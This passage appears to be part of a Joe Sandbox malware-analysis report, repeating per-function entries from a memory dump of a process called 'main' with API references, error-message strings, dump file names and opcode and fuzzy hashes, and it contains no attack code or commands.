Function 00007FF6BFD62801 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6BFD62715

Strings

fs_file_read, xrefs: 00007FF6BFD62752
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6BFD62759

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: c6e1b0db9050e454bb62472ed409b0055bbd509787aa07c3d44467dc1f627cec
Instruction ID: 8f363f456c83260c016397bb3d71d52dfb5acb13af4ebeaf1402bd5970b380c7
Opcode Fuzzy Hash: c6e1b0db9050e454bb62472ed409b0055bbd509787aa07c3d44467dc1f627cec
Instruction Fuzzy Hash: EDF05423B0860321FA529B5C74517B933411F41766E4D4B35DF598FAE1AE3DA987C340

Function 00007FF6BFD627ED Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6BFD62715

Strings

fs_file_read, xrefs: 00007FF6BFD62752
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6BFD62759

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 32b159213577b3bd10ca3da26adaf1b043a79799695e5198cb6d2c401548963a
Instruction ID: c02b91c830691ff778c5b41c0076b2f48adf9a577cd51bde301ada31a14565e8
Opcode Fuzzy Hash: 32b159213577b3bd10ca3da26adaf1b043a79799695e5198cb6d2c401548963a
Instruction Fuzzy Hash: EBF05423B0860321FA529B5CB4517B933412F41766E4D4B35DF4C8FAE1AE3DA987C340

Function 00007FF6BFD626DD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6BFD62715

Strings

fs_file_read, xrefs: 00007FF6BFD62752
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6BFD62759

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 256f824a469a1a7e893449885ed68b795ebefb460f9cffb866b127dcdca9c9a7
Instruction ID: f2d470a9271afabad50fb9956d81e748cf8d5a951462bb6168e8e564295df8d0
Opcode Fuzzy Hash: 256f824a469a1a7e893449885ed68b795ebefb460f9cffb866b127dcdca9c9a7
Instruction Fuzzy Hash: B0F05427B0860321FA525A5CB4517B933411F41766E494B35DF498F6E1AE3DA987C340

Function 00007FF6BFD626D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6BFD62715

Strings

fs_file_read, xrefs: 00007FF6BFD62752
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6BFD62759

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 8f18a1f2469a7fdb70db7ffee0d0267731bb2832d5fa1a4fcaee2b2d363ffd15
Instruction ID: e083c1634cb49af59e73e380dc9c2b25155b7469cfff6d1a7b500ed62b3ea5bc
Opcode Fuzzy Hash: 8f18a1f2469a7fdb70db7ffee0d0267731bb2832d5fa1a4fcaee2b2d363ffd15
Instruction Fuzzy Hash: 25F05427B0860321FA525A5CB4517B933412F41766E494B35DF498F6E1AE3DA987C340

Function 00007FF6BFD626E4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6BFD62715

Strings

fs_file_read, xrefs: 00007FF6BFD62752
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6BFD62759

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 11597d17764ae774a5a2afb7a5df634d5478987383f5b5c3f7417a1326957474
Instruction ID: 49c4efab56eb894ea1ae414040ebd26a3f15ee45b29cda5375ff4563365ef52c
Opcode Fuzzy Hash: 11597d17764ae774a5a2afb7a5df634d5478987383f5b5c3f7417a1326957474
Instruction Fuzzy Hash: E6F05427B0860321FA525A5CB4517B933411F41766E494B35DF598F6E1AE3DA987C340

Function 00007FF6BFD626EB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6BFD62715

Strings

fs_file_read, xrefs: 00007FF6BFD62752
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6BFD62759

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: a49be4b29de6a054d2a070e4a4779da211405afb78a1b38434590739e0465e8c
Instruction ID: f2698647f15afeb0cc04dfd0cd82fa160b93e1c097b64eb8a3907760cb748507
Opcode Fuzzy Hash: a49be4b29de6a054d2a070e4a4779da211405afb78a1b38434590739e0465e8c
Instruction Fuzzy Hash: 49F05427B0860361FA525A5CB4517B933411F41766E494B35DF498F6E1AF3DA987C340

Function 00007FF6BFD626F2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6BFD62715

Strings

fs_file_read, xrefs: 00007FF6BFD62752
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6BFD62759

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 25c0fbb992ff6903f07dba86b08ebbf347e0dd2b2e2bfd93bd002d6724a7c21e
Instruction ID: 73d5442e68c5b16ba87529bc79229a791455b65f99a37fa7aed0b71120e3276d
Opcode Fuzzy Hash: 25c0fbb992ff6903f07dba86b08ebbf347e0dd2b2e2bfd93bd002d6724a7c21e
Instruction Fuzzy Hash: 4AF05427B0860321FA525A9CB4517B973411F41766E494B35DF498FAE1AE3DA987C340

Function 00007FF6BFD626B9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6BFD62715

Strings

fs_file_read, xrefs: 00007FF6BFD62752
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6BFD62759

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 25c0fbb992ff6903f07dba86b08ebbf347e0dd2b2e2bfd93bd002d6724a7c21e
Instruction ID: 73d5442e68c5b16ba87529bc79229a791455b65f99a37fa7aed0b71120e3276d
Opcode Fuzzy Hash: 25c0fbb992ff6903f07dba86b08ebbf347e0dd2b2e2bfd93bd002d6724a7c21e
Instruction Fuzzy Hash: 4AF05427B0860321FA525A9CB4517B973411F41766E494B35DF498FAE1AE3DA987C340

Function 00007FF6BFD6269D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6BFD62715

Strings

fs_file_read, xrefs: 00007FF6BFD62752
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6BFD62759

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 8f18a1f2469a7fdb70db7ffee0d0267731bb2832d5fa1a4fcaee2b2d363ffd15
Instruction ID: e083c1634cb49af59e73e380dc9c2b25155b7469cfff6d1a7b500ed62b3ea5bc
Opcode Fuzzy Hash: 8f18a1f2469a7fdb70db7ffee0d0267731bb2832d5fa1a4fcaee2b2d363ffd15
Instruction Fuzzy Hash: 25F05427B0860321FA525A5CB4517B933412F41766E494B35DF498F6E1AE3DA987C340

Function 00007FF6BFD626A4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6BFD62715

Strings

fs_file_read, xrefs: 00007FF6BFD62752
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6BFD62759

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 256f824a469a1a7e893449885ed68b795ebefb460f9cffb866b127dcdca9c9a7
Instruction ID: f2d470a9271afabad50fb9956d81e748cf8d5a951462bb6168e8e564295df8d0
Opcode Fuzzy Hash: 256f824a469a1a7e893449885ed68b795ebefb460f9cffb866b127dcdca9c9a7
Instruction Fuzzy Hash: B0F05427B0860321FA525A5CB4517B933411F41766E494B35DF498F6E1AE3DA987C340

Function 00007FF6BFD626AB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6BFD62715

Strings

fs_file_read, xrefs: 00007FF6BFD62752
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6BFD62759

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 11597d17764ae774a5a2afb7a5df634d5478987383f5b5c3f7417a1326957474
Instruction ID: 49c4efab56eb894ea1ae414040ebd26a3f15ee45b29cda5375ff4563365ef52c
Opcode Fuzzy Hash: 11597d17764ae774a5a2afb7a5df634d5478987383f5b5c3f7417a1326957474
Instruction Fuzzy Hash: E6F05427B0860321FA525A5CB4517B933411F41766E494B35DF598F6E1AE3DA987C340

Function 00007FF6BFD626B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF6BFD62715

Strings

fs_file_read, xrefs: 00007FF6BFD62752
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6BFD62759

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: a49be4b29de6a054d2a070e4a4779da211405afb78a1b38434590739e0465e8c
Instruction ID: f2698647f15afeb0cc04dfd0cd82fa160b93e1c097b64eb8a3907760cb748507
Opcode Fuzzy Hash: a49be4b29de6a054d2a070e4a4779da211405afb78a1b38434590739e0465e8c
Instruction Fuzzy Hash: 49F05427B0860361FA525A5CB4517B933411F41766E494B35DF498F6E1AF3DA987C340

Function 00007FFE1150D96E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1150D98D

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_get_value, xrefs: 00007FFE1150D9D6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1150D9DD

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: b5112363587d99b95d5a7f1dded878a80b264a2cc813f320591506a8cef08d33
Instruction ID: ac454b16bc1c1e4f5e6701ea4cdc2e7c447c29a061f08adb4b5ae369e0a6971b
Opcode Fuzzy Hash: b5112363587d99b95d5a7f1dded878a80b264a2cc813f320591506a8cef08d33
Instruction Fuzzy Hash: 3AF09662A08F4642E7528F46B8413BD725DAF447B4F48017ADD5D466B0EF2DD9859700

Function 00007FFE1150D97C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1150D98D

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_get_value, xrefs: 00007FFE1150D9D6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1150D9DD

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: 139b1378e786c4bbf6d8834e6450c444383a5ff76061a4ea2f00fd8a700af190
Instruction ID: 63e70f034a86a62ac9668ebfc3871d533be5c0b4a0e4d0b54ad785b4f81c316f
Opcode Fuzzy Hash: 139b1378e786c4bbf6d8834e6450c444383a5ff76061a4ea2f00fd8a700af190
Instruction Fuzzy Hash: 7CF09662A08F4642E7528F86B8413BD725DAF447B4F48017ADD5D466B0EF2DD9859700

Function 00007FFE1150D9F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1150D98D

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_get_value, xrefs: 00007FFE1150D9D6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1150D9DD

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: f66e2a320b883bb9a613bc1679b292a285cefaa8b8d887a1be1bdc0c68d29d64
Instruction ID: e44c0e1d9db5d2fe9235c4d4ae83c3aa04cc405537e6bb3d4c43a594a8477c6e
Opcode Fuzzy Hash: f66e2a320b883bb9a613bc1679b292a285cefaa8b8d887a1be1bdc0c68d29d64
Instruction Fuzzy Hash: 4DF09662A08F4642E7528F46B8413BD725DBF447B4F480279DD9D466B0EF2DD9899700

Function 00007FFE1150D8E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1150D98D

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_get_value, xrefs: 00007FFE1150D9D6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1150D9DD

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
API String ID: 1001908780-1680961811
Opcode ID: b4a7218769dee61c1c103bb07a9ae610b9717e13391145cb5cf82966d04e807d
Instruction ID: 2b1401c0a96c61a27ef3008ba2e6be9b01f8a3f503cb86d894ec22f429ba7a46
Opcode Fuzzy Hash: b4a7218769dee61c1c103bb07a9ae610b9717e13391145cb5cf82966d04e807d
Instruction Fuzzy Hash: EBF09662A08E4642E7528F46B8413BD725DBF447B4F480179DD5D466F0EF2DD9899700

Function 00007FFE1150D8DD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE1150D98D

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_get_value, xrefs: 00007FFE1150D9D6
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE1150D9DD

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
